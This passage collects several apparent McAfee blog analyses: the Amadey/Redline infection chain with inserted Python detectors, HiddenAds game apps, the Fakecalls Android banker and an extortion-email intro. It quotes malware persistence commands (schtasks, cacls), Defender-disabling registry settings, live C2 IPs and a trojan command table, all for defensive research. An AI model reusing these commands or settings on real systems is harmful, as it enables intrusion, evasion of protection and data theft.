Mika.exe is a 32-bit Portable Executable compiled in .NET and is just 11 KB in size. The original name of the file is “Healer.exe”. This executable generates no network activity but modifies the target machine in a way that helps the malware of later stages execute.
The intent of mika.exe is to turn off Windows Defender in every possible way. Once mika.exe was executed, this is how the Defender settings of the system looked:
Figure 12: Real-time protection turned off
This setting was irreversible and could not be turned back on through Windows Settings. Procmon logs were then analyzed, and they contained entries concerning Windows Defender, such as:
Figure 13: Procmon logs
To validate this, the Registry was analysed and all the changes were found there, in exactly the order recorded in the Procmon logs. In Windows, the registry is a hierarchical database that stores configuration settings and options for the operating system, as well as for applications and devices. It holds information about the hardware, software, user preferences, and system settings of a Windows computer. The following keys are added under Real-Time Protection:
Figure 14: Keys added in Registry
By doing so, the malware prevents normal users from turning Windows Defender back on. When attackers disable Windows Defender through the registry, the change is likely to persist even if the user or administrator tries to re-enable it through the Windows Defender settings. This allows the attacker to maintain control over the system for a longer period and lets the later-stage malware execute without hindrance. Any malware can benefit from this, whether or not it belongs to this campaign.
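The Procmon entries and registry changes described above map directly onto a detection rule. The following is an added Python example (not code from the report): it parses a Procmon CSV export and flags RegSetValue operations that write 1 into the Defender Real-Time Protection policy key. The CSV rows are constructed for the example, and the value names (DisableRealtimeMonitoring and the others) are the well-known Defender policy values; the report itself shows the keys the sample wrote only in Figure 14, so treat the exact names here as assumptions.

```python
import csv
import io
import re

# Policy key under which Defender's real-time protection settings live (well-known path).
RTP_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
# Well-known policy values; assumed for the example, not copied from the report's Figure 14.
DISABLE_VALUES = {
    "DisableRealtimeMonitoring",
    "DisableBehaviorMonitoring",
    "DisableOnAccessProtection",
    "DisableScanOnRealtimeEnable",
    "DisableIOAVProtection",
}

# Constructed Procmon-style CSV export (not the capture from the report). Column layout follows
# Procmon's "Save as CSV" output; the "Detail" column carries the type and data of a RegSetValue.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","mika.exe","4120","RegCreateKey","HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection","SUCCESS","Desired Access: All Access"
"10:01:02.2","mika.exe","4120","RegSetValue","HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"10:01:02.3","mika.exe","4120","RegSetValue","HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"10:01:02.4","mika.exe","4120","RegSetValue","HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"10:01:03.0","explorer.exe","1234","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"10:01:03.5","MsMpEng.exe","2900","RegQueryValue","HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
'''


def parse_procmon_csv(text: str) -> list:
    """Parse a Procmon CSV export into one dict per event, keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))


def find_defender_tampering(events: list) -> list:
    """Return RegSetValue events that set one of the Disable* values under the RTP policy key to 1."""
    hits = []
    for event in events:
        if event["Operation"] != "RegSetValue":
            continue
        key, _, value_name = event["Path"].rpartition("\\")
        if key.lower() != RTP_KEY.lower() or value_name not in DISABLE_VALUES:
            continue
        data = re.search(r"Data:\s*(\d+)", event["Detail"])
        if data and int(data.group(1)) == 1:
            hits.append({"process": event["Process Name"], "pid": event["PID"], "value": value_name})
    return hits


if __name__ == "__main__":
    for hit in find_defender_tampering(parse_procmon_csv(SAMPLE_CSV)):
        print(f"{hit['process']} (PID {hit['pid']}) disabled {hit['value']}")
```

Only writes of 1 by a non-Defender process are reported; the RegQueryValue by the Defender service and the unrelated Explorer setting in the sample are ignored, which is the distinction an alert on this key needs to make.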
Vona.exe, a variant of the Amadey malware family, is compiled in C/C++ and is 236 KB in size. This is the last file to be executed from the current cluster. When executed, a highly extensive process tree quickly appeared.
Figure 15: Process tree of vona.exe
An immediate child process of vona.exe is mnolyk.exe, another Amadey component, which is dropped in a subfolder of the TEMP folder.
Figure 16: mnolyk.exe dropped in TEMP folder
Mnolyk.exe makes active connections to the IP addresses 62.204.41.5 and 62.204.41.251.
Malicious DLLs, which are executed later in the campaign, are downloaded from 62.204.41.5. The infected host was directed to fetch two DLLs, cred.dll and clip.dll.
Figure 17: Malicious dlls downloaded
From 62.204.41.251, various executables are downloaded to the TEMP folder and later executed. The executables downloaded are:
fuka.exe
Figure 18: fuka.exe
nikas.exe
Figure 19: nikas.exe
igla.exe
Figure 20: igla.exe
nocr.exe
Figure 21: nocr.exe
lebro.exe
Figure 22: lebro.exe
Following the execution of mnolyk.exe, a series of schtasks.exe and cacls.exe commands were executed.
The command line for schtasks.exe is “C:\Windows\System32\schtasks.exe” /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR “C:\Users\test\AppData\Local\Temp\5eb6b96734\mnolyk.exe” /F
So the command line creates a scheduled task (/SC MINUTE /MO 1) that runs once every minute. The task is named mnolyk.exe (/TN), and its action (/TR) is the path to the dropped mnolyk.exe.
There were several instances of cacls.exe created. One of them is explained here along with its parameters. The command line is: CACLS "mnolyk.exe" /P "test:R" /E
So the command line CACLS mnolyk.exe /P test:R /E sets the “test” user or group’s permission on the “mnolyk.exe” file to “Read” (/E edits the existing ACL rather than replacing it). Hence the user “test” can neither modify nor delete this file. Another of the observed command lines used “/P test:N” instead of “/P test:R”, which gives the user “None” permission.
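Reading the two command lines above programmatically, as an added example that is not part of the report: this Python parses schtasks /Create and CACLS invocations and flags the combination seen here, a task firing every minute for a binary under the user’s Temp folder, and a dropped executable whose owning user is cut down to Read or None. The sample command lines are reconstructed from the ones quoted above (user name and paths as shown there) plus one benign control; the cut-off of five minutes for “runs every few minutes” is an assumption.

```python
import re

# Constructed command lines modeled on the ones quoted above, plus a benign daily task as a control.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test\AppData\Local\Temp\5eb6b96734\mnolyk.exe" /F',
    r'CACLS "mnolyk.exe" /P "test:R" /E',
    r'CACLS "mnolyk.exe" /P "test:N" /E',
    r'"C:\Windows\System32\schtasks.exe" /Create /SC DAILY /TN Backup /TR "C:\Program Files\Tool\backup.exe"',
]

TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
PERMISSION_NAMES = {"N": "None", "R": "Read", "W": "Write", "C": "Change", "F": "Full control"}
MAX_MINUTES = 5  # assumption: a MINUTE schedule with /MO at or below this counts as "every few minutes"


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted paths whole and dropping the quotes."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_switches(tokens: list) -> dict:
    """Map each /SWITCH to the token that follows it, or None when the switch takes no argument."""
    switches = {}
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else None
            if nxt is not None and not nxt.startswith("/"):
                switches[tok.upper()] = nxt
                i += 2
                continue
            switches[tok.upper()] = None
        i += 1
    return switches


def analyze_schtasks(tokens: list) -> dict:
    sw = parse_switches(tokens)
    schedule = (sw.get("/SC") or "").upper()
    modifier = int(sw.get("/MO") or 1)
    action = sw.get("/TR") or ""
    frequent = schedule == "MINUTE" and modifier <= MAX_MINUTES
    from_temp = bool(TEMP_PATH.search(action))
    reasons = [text for text, hit in (("runs every few minutes", frequent), ("binary lives under Temp", from_temp)) if hit]
    return {"tool": "schtasks", "task_name": sw.get("/TN"), "action": action,
            "suspicious": frequent and from_temp, "reasons": reasons}


def analyze_cacls(tokens: list) -> dict:
    sw = parse_switches(tokens)
    target = tokens[1] if len(tokens) > 1 else ""
    user, _, perm = (sw.get("/P") or sw.get("/G") or "").partition(":")
    # Leaving the owning account with Read or None protects the dropped binary from that account
    locked_down = target.lower().endswith(".exe") and perm.upper() in {"R", "N"}
    return {"tool": "cacls", "target": target, "user": user, "edit_acl": "/E" in sw,
            "permission": PERMISSION_NAMES.get(perm.upper(), perm), "suspicious": locked_down}


def analyze_cmdline(cmdline: str) -> dict:
    """Dispatch on the executable name (path and case are ignored)."""
    tokens = tokenize(cmdline)
    exe = tokens[0].rsplit("\\", 1)[-1].lower() if tokens else ""
    if exe.startswith("schtasks"):
        return analyze_schtasks(tokens)
    if exe.startswith("cacls"):
        return analyze_cacls(tokens)
    return {"tool": exe, "suspicious": False}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze_cmdline(line))
```

Neither indicator is conclusive on its own, which is why the schtasks check requires both the minute-level schedule and the Temp-folder path; the control task in the sample (daily, Program Files) is not flagged.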
Fuka.exe
Fuka.exe, a variant of the Redline Stealer malware family, is 175 KB in size and is compiled in .NET. The original name of the file is Samarium.exe. It shows some network activity with the IP 193.233.20.11.
Figure 23: Network activity of fuka.exe
Nikas.exe
Nikas.exe is a 248 KB executable compiled in C/C++. It disables automatic updates for Windows and checks the status of all the sub-fields of Real-Time Protection that were previously changed by mika.exe. No network activity was found during replication.
Igla.exe
Igla.exe is a 520 KB file compiled in C/C++. The original name of the file is WEXTRACT.EXE.MUI. As with cydn.exe, this PE also has two more executables packed in its resource section, bvPf.exe and cmkmka.exe. Once igla.exe is executed, bvPf.exe is executed, followed by cmkmka.exe.
Figure 24: RUNPROGRAM attribute in igla.exe
Figure 25: POSTRUNPROGRAM attribute in igla.exe
bvPf.exe
bvPf.exe is 306 KB in size and is compiled in C/C++. The original filename is nightskywalker.exe. The file is dropped in a subfolder of the system’s TEMP folder.
The executable tried to connect to 193.233.20.11, but the server did not respond and no communication took place.
cmkmka.exe
cmkmka.exe is a 32-bit PE file, 283.5 KB in size. It launches AppLaunch.exe, which communicates with the C2.
It communicates with the IP address 176.113.115.17, an active C2 for Redline Stealer, on port 4132.
Figure 26: Data exfiltration
The blue-colored content in the capture is the data transmitted by the Command and Control (C2) server: instructions telling the malware which data to retrieve, along with the corresponding paths. These paths include the user profiles of different web browsers, various crypto wallet paths, and other related data.
As a response, all the data residing at the specified paths is sent back to the C2 server of the malware. This includes all the profiles of different web browsers, information related to crypto wallets, and even user-related data from the Windows operating system. This process allows the C2 server to collect a vast amount of sensitive information from the infected system, which could be exploited by the attackers for malicious purposes.
Nocr.exe
Nocr.exe, a component of Redline Stealer, is a 175 KB .NET binary. The original name of the file is Alary.exe. It communicates with the IP address 176.113.115.17.
Lebro.exe
Lebro.exe, a component of Amadey, is a 235 KB file compiled in C/C++. Lebro.exe is responsible for executing nbveek.exe, the next stage of the malware. The file is again dropped in the TEMP folder.
Figure 27: Dropping another executable in TEMP folder
lebro.exe and nbveek.exe have the same hash, so they are the same binary and therefore also Amadey. It connects to the IP 62.204.41.88.
Figure 28: Network activity of nbveek.exe
The target system executes a PHP file whose content includes the command to download another executable, setupff.exe. This executable is downloaded to the TEMP folder.
Before setupff.exe is executed, the same series of schtasks.exe and cacls.exe commands seen previously is executed again, with the same parameters passed for nbveek.exe as for mnolyk.exe.
Setupff.exe
Setupff.exe is compiled in C/C++ and is 795 KB in size. The file could not execute and threw a Windows error.
Later, another instance of setupff.exe was created, which in turn invokes multiple instances of rundll32.exe. Here, the two DLLs downloaded by mnolyk.exe, clip64.dll and cred64.dll, are executed through rundll32.exe. McAfee Labs detects these DLLs as Amadey malware.
Network activity shows the DLL connecting to 62.204.41.88 and again exfiltrating data to the C2:
Figure 29: Data exfiltration
To conclude, the threat posed by the multi-stage attack that drops the Amadey botnet, and subsequently Redline Stealer, is significant and requires constant vigilance from both consumers and security professionals. By using the Amadey botnet as a delivery mechanism for other malware, attackers can leverage these same capabilities to evade detection and maintain persistence on infected computers. They can use Amadey to drop a wide range of malware, such as spyware, ransomware, and trojans, which can be used for a variety of malicious purposes, such as stealing sensitive information, encrypting files for ransom, or taking control of a computer for use in a larger botnet. Our analysis of various samples of this attack has revealed that the Amadey botnet distributes malware from multiple families and is not restricted to Redline Stealer alone.
At McAfee, we are committed to providing our customers with robust and effective antivirus and anti-malware solutions that can detect and protect against threats like the Amadey botnet and other malware families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats before they can cause damage.
File Type | SHA-256 | Product | Detection |
.exe | 80fed7cd4c7d7cb0c05fe128ced6ab2b9b3d7f03edcf5ef532c8236f00ee7376 | Total Protection and LiveSafe | Downloader-FCND, Lockbit-FSWW, PWS-FDON |
.exe | d8e9b2d3afd0eab91f94e1a1a1a0a97aa2974225f4f086a66e76dbf4b705a800 | Total Protection and LiveSafe | PWS-FDON, Lockbit-FSWW |
.exe | 1d51e0964268b35afb43320513ad9837ec6b1c0bd0e56065ead5d99b385967b5 | Total Protection and LiveSafe | Lockbit-FSWW |
.exe | 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38 | Total Protection and LiveSafe | PWS-FDON |
.exe | 6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116 | Total Protection and LiveSafe | Downloader-FCND |
.exe | 6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116 | Total Protection and LiveSafe | Downloader-FCND |
.exe | 8020580744f6861a611e99ba17e92751499e4b0f013d66a103fb38c5f256bbb2 | Total Protection and LiveSafe | AgentTesla-FCYU |
.exe | 021ae2fadbc8bc4e83013de03902e6e97c2815ab821adaa58037e562a6b2357b | Total Protection and LiveSafe | Lockbit-FSWW |
.exe | aab1460440bee10e2efec9b5c83ea20ed85e7a17d4ed3b4a19341148255d54b1 | Total Protection and LiveSafe | Lockbit-FSWW |
.exe | 54ce28a037eea87448e65bc25f8d3a38ddd4b4679516cc59899b77150aa46fcc | Total Protection and LiveSafe | GenericRXVK-HF |
.exe | 0cca99711baf600eb030bbfcf279faf74c564084e733df3d9e98bea3e4e2f45f | Total Protection and LiveSafe | AgentTesla-FCYU |
.exe | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b | Total Protection and LiveSafe | Downloader-FCND |
.exe | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b | Total Protection and LiveSafe | Downloader-FCND |
.exe | d40d2bfa9fcbf980f76ce224ab6037ebd2b081cb518fa65b8e208f84bc155e41 | Total Protection and LiveSafe | GenericRXVJ-QP |
.dll | cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0 | Total Protection and LiveSafe | PWS-FDOE |
.dll | 10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8 | Total Protection and LiveSafe | Trojan-FUUW |
.dll | 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405 | Total Protection and LiveSafe | Trojan-FUUW |
IPv4 | 193.233.20.7 | ||
IPv4 | 62.204.41.5 | ||
IPv4 | 62.204.41.251 | ||
IPv4 | 193.233.20.11 | ||
IPv4 | 176.113.115.17 | ||
IPv4 | 62.204.41.88 |
The post Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution appeared first on McAfee Blog.
Authored by Dexter Shin
Minecraft is a popular video game that can be played on a desktop or mobile. This is a sandbox game developed by Mojang Studios. Players create and break apart various kinds of blocks in 3-dimensional worlds and they can select to enjoy Survivor Mode to survive in the wild or Creative Mode to focus on being creative.
Minecraft’s popularity has led to many attempts to recreate similar games. As a result, there are a great many games with the same concept as Minecraft worldwide, and even on Google Play we can easily find similar games. McAfee Mobile Research Team recently discovered 38 games with hidden advertising. These HiddenAds applications, discovered on the Google Play Store and installed by at least 35 million users worldwide, have been found to stealthily send advertising packets in bulk for ad revenue.
McAfee, a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem, reported the discovered apps to Google, which took prompt action; the apps are no longer available on Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices, and McAfee Mobile Security detects this threat as Android/HiddenAds.BJL. For more information, and to get fully protected, visit McAfee Mobile Security.
They were officially uploaded to Google Play under various titles and package names. Many games have already been downloaded by users, including apps with 10M+ downloads.
Figure 1. 10M+ downloaded app being one of them
Also, because the game itself is playable, users do not notice the large volume of advertising packets being generated on their devices.
Figure 2. Game screen that can be played
Once the game is running, the user can play in the block-based world without any problems, just like in other Minecraft-style games. Meanwhile, however, advertising packets to various domains are continuously generated on the device. For example, the four packets shown in the picture are questionable packets generated by the ad libraries of Unity, Supersonic, Google, and AppLovin. Yet nothing is displayed on the game screen.
Figure 3. Continuous advertising packets
What’s even more interesting is the initial network packet of these games. Its structure is very similar across the apps: the domains all differ, but the path 3.txt is the same. That is, a request of the form https://(random).netlify.app/3.txt is always the first packet. The picture below shows the first packet extracted from three different apps.
Figure 4. Similarity of the initial packet form
This threat has been detected in various countries around the world. According to our telemetry, it has been most prominently detected in the United States, Canada, South Korea, and Brazil.
Figure 5. Users around the world who are widely affected
As we featured in the McAfee 2023 Consumer Mobile Threat Report, games are one of the most accessible types of content for young people using mobile devices. Malware authors are also aware of this and try to hide their malicious features inside games. Not only is it difficult for general users to find these hidden features, but users also readily trust games from official stores such as Google Play.
We first recommend that users thoroughly read user reviews before downloading applications from the store. Users should also install security software on their devices and keep it up to date.
Package Name | Application Name | SHA256 | GooglePlay Downloads |
com.good.robo.game.builder.craft.block | Block Box Master Diamond | 300343e701afddbf32bca62916fd717f2af6e8a98fd78cc50d11f1154971d857 | 10M+ |
com.craft.world.fairy.fun.everyday.block | Craft Sword Mini Fun | 72fa914ad3460f9e696ca2264fc899cad20b06b640a7adf8cfe87dd0ea19e137 | 5M+ |
com.skyland.pet.realm.block.rain.craft | Block Box Skyland Sword | d15713467be2f60b2bc548ddb24f202eb64f2aed3fb8801daec14e708f5cee5b | 5M+ |
com.skyland.fun.block.game.monster.craft | Craft Monster Crazy Sword | cadbc904e77feaaf4294d218808f43d50809a87202292e78b0e6a3e164de6851 | 5M+ |
com.monster.craft.block.fun.robo.fairy | Block Pro Forrest Diamond | 08429992bef8259e3011af36ad9d3c2a61b8df384860fd2a007a32a1e4d634af | 1M+ |
com.cliffs.realm.block.craft.rain.vip | Block Game Skyland Forrest | 34ef407f2bedfd8485f6a178f14ee023d395cb9b76ff1754e8733c1fc9ce01fb | 1M+ |
com.block.builder.build.clever.craft.boy | Block Rainbow Sword Dragon | 23aa3cc9481591b524a442fa8df485226e21da9d960dc5792af4ae2a096593d5 | 1M+ |
com.fun.skyland.craft.block.monster.loki | Craft Rainbow Mini Builder | 88fa7de264c5880e65b926df4f75ac6a2900e3718d9d3576207614e20f674068 | 1M+ |
com.skyland.craft.caves.game.monster.block | Block Forrest Tree Crazy | 010c081e5fda58d6508980528efb4f75e572d564ca9b5273db58193c59987abf | 1M+ |
com.box.block.craft.builder.cliffs.build | Craft Clever Monster Castle | 11c5e2124e47380d5a4033c08b2a137612a838bc46f720fba2a8fe75d0cf4224 | 500K+ |
com.block.sun.game.box.build.craft | Block Monster Diamond Dragon | 19ad0dc40772d29f7f39b3a185abe50d0917cacf5f7bdc577839b541f61f7ac0 | 500K+ |
com.builder.craft.diamond.block.clever.robo | Craft World Fun Robo | 746e2f552fda2e2e9966fecf6735ebd5a104296cde7208754e9b80236d13e853 | 500K+ |
com.block.master.boy.craft.cliffs.diamond | Block Pixelart Tree Pro | 25b22e14f0bb79fc6b9994faec984501d0a2bf5573835d411eb8a721a8c2e397 | 500K+ |
com.fun.block.everyday.boy.robo.craft | Craft Mini Lucky Fun | 9fdddf4a77909fd1d302c8f39912a41483634db66d30f89f75b19739eb8471ff | 500K+ |
com.builder.craft.block.sun.game.mini | Block Earth Skyland World | b9284db049c0b641a6b760e7716eb3561e1b6b1f11df8048e9736eb286c2beed | 500K+ |
com.dragon.craft.world.pixelart.block.vip | Block Rainbow Monster Castle | d6984e08465f08e9e39a0cad8da4c1e405b3aa414608a6d0eaa5409e7ed8eac1 | 500K+ |
com.craft.vip.earth.everyday.block.game | Block Fun Rainbow Builder | f3077681623d9ce32dc6a9cbf5d6ab7041297bf2a07c02ee327c730e41927c5f | 500K+ |
com.block.good.mini.craft.box.best | Craft Dragon Diamond Robo | e685fb5a426fe587c3302bbd249f8aa9e152c1de9b170133dfb492ed5552acc9 | 500K+ |
com.lucky.robo.craft.loki.block.good | Block World Tree Monster | 06c3ba10604c38006fd34406edd47373074d57c237c880a19fb8d3f34572417d | 100K+ |
com.caves.robo.craft.dragon.block.earth | Block Diamond Boy Pro | 122406962c303eaeb9839d767835a82ae9d745988deeef4c554e1750a5106cf0 | 100K+ |
com.tree.world.city.block.craft.crazy | Block Lucky Master Earth | e69fe06cb77626be76f2c92ad4229f6eb04c06c73e153d5424386a1309adbd15 | 100K+ |
com.game.skyland.craft.monster.block.best | Craft Forrest Mini Fun | e5fc2e6e3749cb4787a8bc5387ebb7802a2d3f9b408e4d2d07ee800056bb3e16 | 100K+ |
com.everyday.vip.caves.house.block.craft | Craft Sword City Pro | 318165fd8d77a63ca221f5d3ee163e6f2d6df1f2df5c169aca6aca23aef2cf25 | 100K+ |
com.cell.rain.block.craft.loki.fairy | Block Loki Monster Builder | 4f22be2ce64376f046ca180bd9933edcd62fd36f4a7abc39edf194f7170e2534 | 100K+ |
com.block.good.sun.boy.craft.fun | Block Boy Earth Mini | 3b0cf56fb5929d23415259b718af15118c44cf918324cc62c1134bf9bc0f2a00 | 100K+ |
com.fairy.builder.sun.skyland.craft.block | Block Crazy Builder City | 537638903f31e32612bddc79a483cb2c7546966cca64c5becec91d6fc4835e22 | 100K+ |
com.monster.house.good.block.earth.craft | Craft Sword Vip Pixelart | 5f85f020eb8afc768e56167a6d1b75b6d416ecb1ec335d4c1edb6de8f93a3cad | 100K+ |
com.block.best.boy.craft.sword.cell | Block City Fun Diamond | 698544a913cfa5df0b2bb5d818cc0394c653c9884502a84b9dec979f8850b1e7 | 100K+ |
com.crazy.clever.city.block.caves.craft | Craft City Loki Rainbow | ba50dc2d2aeef9220ab5ff8699827bf68bc06caeef1d24cb8d02d00025fcb41c | 100K+ |
com.cliffs.builder.craft.block.lucky.earth | Craft Boy Clever Sun | 77962047b32a44c472b89d9641d7783a3e72c156b60eaaec74df725ffdc4671b | 100K+ |
com.lucky.best.block.game.diamond.craft | Block City Dragon Sun | ac3d0b79903b1e63b449b64276075b337b002bb9a9a9636a47fdd1fb7a0fe368 | 100K+ |
com.build.craft.boy.loki.master.block | Craft Loki Forrest Monster | a2db1eba73d911142134ee127897d5857c521135a8ee768ae172ae2d2ee7b1d4 | 100K+ |
com.build.lokicrafts.master.forest | Lokicraft: Forrest Survival 3D | 0f53996f5e3ec593ed09e55baf1f93d32d891f7d7e58a9bf19594b235d3a8a84 | 50K+ |
com.sun.realm.craft.lucky.dragon.block | Craft Castle Sun Rain | 1e74e73bc29ce1f55740e52250506447b431eb8a4c20dfc75fd118b05ca18674 | 50K+ |
com.block.craft.vip.sun.game.box | Craft Game Earth World | 7483b6a493c0f4f6309e21cc553f112da191b882f96a87bce8d0f54328ac7525 | 50K+ |
com.rain.crazy.lucky.pro.block.craft | Craft Lucky Castle Builder | de5eb8284ed56e91e665d13be459b9a0708fa96549a57e81aa7c11388ebfa535 | 50K+ |
com.JavaKidz.attacksnake | Craftsman: Building City 2022 | e19fcc55ec4729d52dc0f732da02dc5830a2f78ec2b1f37969ee3c7fe16ddb37 | 50K+ |
com.skyland.house.block.craft.crazy.vip | Craft Rainbow Pro Rain | a7675a08a0b960f042a02710def8dd445d9109ca9da795aed8e69a79e014b46f | 50K+ |
The post HiddenAds Spread via Android Gaming Apps on Google Play appeared first on McAfee Blog.
Authored by Dexter Shin
McAfee Mobile Research Team found an Android banking trojan signed with a key used by legitimate apps in South Korea last year. By design, Android requires that every application be signed with a key (held in a keystore) before it can be installed or updated. Because this key can only be used by the developer who created it, an application signed with the same key is assumed to belong to the same developer. This Android banking trojan uses such a legitimate signing key to bypass signature-based detection techniques. Until now, these banking trojans have not been distributed on Google Play or other official app stores. This threat was disclosed to the company that owns the legitimate key last year, and the company has taken precautions: it has confirmed that it replaced the signing key and that all of its legitimate apps are currently signed with a new one.
While tracking the Android banking trojan Fakecalls, we found a sample using the same signing key as a well-known app in Korea. This app is developed by a reputable IT services company with extensive businesses across various sectors, including but not limited to IT, gaming, payment, and advertising. We confirmed that most of the malicious samples using this key pretend to be a banking app, as they use the same icon as the real banking apps.
Figure 1. Malware and legitimate app on Google Play
The domains verified last August, when we first discovered the samples, are now down. However, we investigated URLs related to this malware and found similar ones related to this threat. Among them, we identified a phishing site that was still alive during our research. The site is also disguised as a banking site.
Figure 2. A phishing page disguised as a Korean banking site
We also found that they updated the domain information of this web page a few days before our investigation.
So we took a deeper look into this domain and found additional unusual IP addresses that led us to the Command and Control (C2) server admin pages used by the cybercriminals to control the infected devices.
Figure 3. Fakecalls Command and Control (C2) admin pages
When we check the APK file structure, we can see that this malware uses a packer to avoid analysis and detection. The malicious code is encrypted in one of the files below.
Figure 4. Tencent’s Legu Packer libraries
After decrypting the DEX file, we found some unusual functionality. The code below reads Android package information from a file with an HTML extension.
Figure 5. Questionable code in the decrypted DEX file
This file is in fact another APK (Android Application) rather than a traditional HTML file designed to be displayed in a web browser.
Figure 6. APK file disguised as an HTML file
When the user launches the malware, it immediately asks for permission to install another app. It then tries to install an application stored in the “assets” directory as “introduction.html”. This “introduction.html” is in fact an APK file, and the real malicious behavior happens there.
Figure 7. Dropper asks you to install the main payload
When the dropped payload is about to be installed, it asks for several permissions to access sensitive personal information.
Figure 8. Permissions required by the main malicious application
It also registers several services and receivers to control notifications from the device and to receive commands from a remote Command and Control server.
Figure 9. Services and receivers registered by the main payload
Notably, the malware uses a legitimate push SDK to receive commands from the remote server. Here is the complete list of commands and their purposes.
Command name | Purpose |
note | sms message upload |
incoming_transfer | caller number upload |
del_phone_record | delete call log |
zhuanyi | set call forwarding with parameter |
clear_note | delete sms message |
assign_zhuanyi | set call forwarding |
file | file upload |
lanjie | block sms message from specified numbers |
allfiles | find all possible files and upload them |
email_send | send email |
record_telephone | call recording on |
inout | re-mapping on C2 server |
blacklist | register as blacklist |
listener_num | no function |
no_listener_num | disable monitoring a specific number |
rebuild | reset and reconnect with C2 |
deleteFile | delete file |
num_address_list | contacts upload |
addContact | add contacts |
all_address_list | call record upload |
deleteContact | delete contacts |
note_intercept | intercept sms message from specified numbers |
intercept_all_phone | intercept sms message from all |
clear_date | delete all file |
clear_phone_contact | delete all contacts |
clear_phone_record | delete all call log |
per_note | quick sms message upload |
soft_name | app name upload |
Cybercriminals are constantly evolving and using new ways to bypass security checks, such as abusing legitimate signing keys. Fortunately, there was no damage to users due to this signing key leak. However, we recommend that users install security software on their devices to respond to these threats. Also, users are recommended to download and use apps from the official app stores.
McAfee Mobile Security detects this threat as Android/Banker regardless of whether the application is signed with the previously legitimate signing key.
Indicators of Compromise
SHA256 | Name | Type |
7f4670ae852ec26f890129a4a3d3e95c079f2f289e16f1aa089c86ea7077b3d8 | 신한신청서 | Dropper |
9e7c9b04afe839d1b7d7959ad0092524fd4c6b67d1b6e5c2cb07bb67b8465eda | 신한신청서 | Dropper |
21ec124012faad074ee1881236c6cde7691e3932276af9d59259df707c68f9dc | 신한신청서 | Dropper |
9621d951c8115e1cc4cf7bd1838b8e659c7dea5d338a80e29ca52a8a58812579 | 신한신청서 | Dropper |
60f5deb79791d2e8c2799e9af52adca5df66d1304310d1f185cec9163deb37a2 | 보안인증서 | Banker |
756cffef2dc660a241ed0f52c07134b7ea7419402a89d700dffee4cc6e9d5bb6 | 보안인증서 | Banker |
6634fdaa22db46a6f231c827106485b8572d066498fc0c39bf8e9beb22c028f6 | 보안인증서 | Banker |
52021a13e2cd7bead4f338c8342cc933010478a18dfa4275bf999d2bc777dc6b | 보안인증서 | Banker |
125772aac026d7783b50a2a7e17e65b9256db5c8585324d34b2e066b13fc9e12 | 보안인증서 | Banker |
a320c0815e09138541e9a03c030f30214c4ebaa9106b25d3a20177b5c0ef38b3 | 보안인증서 | Banker |
c7f32890d6d8c3402601743655f4ac2f7390351046f6d454387c874f5c6fe31f | 보안인증서 | Banker |
dbc7a29f6e1e91780916be66c5bdaa609371b026d2a8f9a640563b4a47ceaf92 | 보안인증서 | Banker |
e6c74ef62c0e267d1990d8b4d0a620a7d090bfb38545cc966b5ef5fc8731bc24 | 보안인증서 | Banker |
Domains:
The post Fakecalls Android Malware Abuses Legitimate Signing Key appeared first on McAfee Blog.
Authored by Lakshya Mathur and Sriram P
McAfee Intelligence observed a huge spike in extortion email frauds over the past month. The intent of these fraudulent activities is to intimidate individuals into paying a specified amount of money as a ransom.
Figure 1 shows the number of blackmail emails received over a month recently.
Figure 1 – Stats for 20 February 2023 – 23rd March 2023
In this blog, we’ll delve into frauds that are becoming increasingly common in the digital age. We’ll first define what these frauds are and provide examples to help readers better understand the nature of these frauds. Additionally, we’ll explore how these frauds are on the rise, highlighting the reasons behind this trend and the impact it has on individuals.
Finally, we’ll provide practical advice to help consumers protect themselves from these types of attacks. This will include a discussion of some of the most effective measures individuals can take to safeguard their personal and financial information from fraudsters.
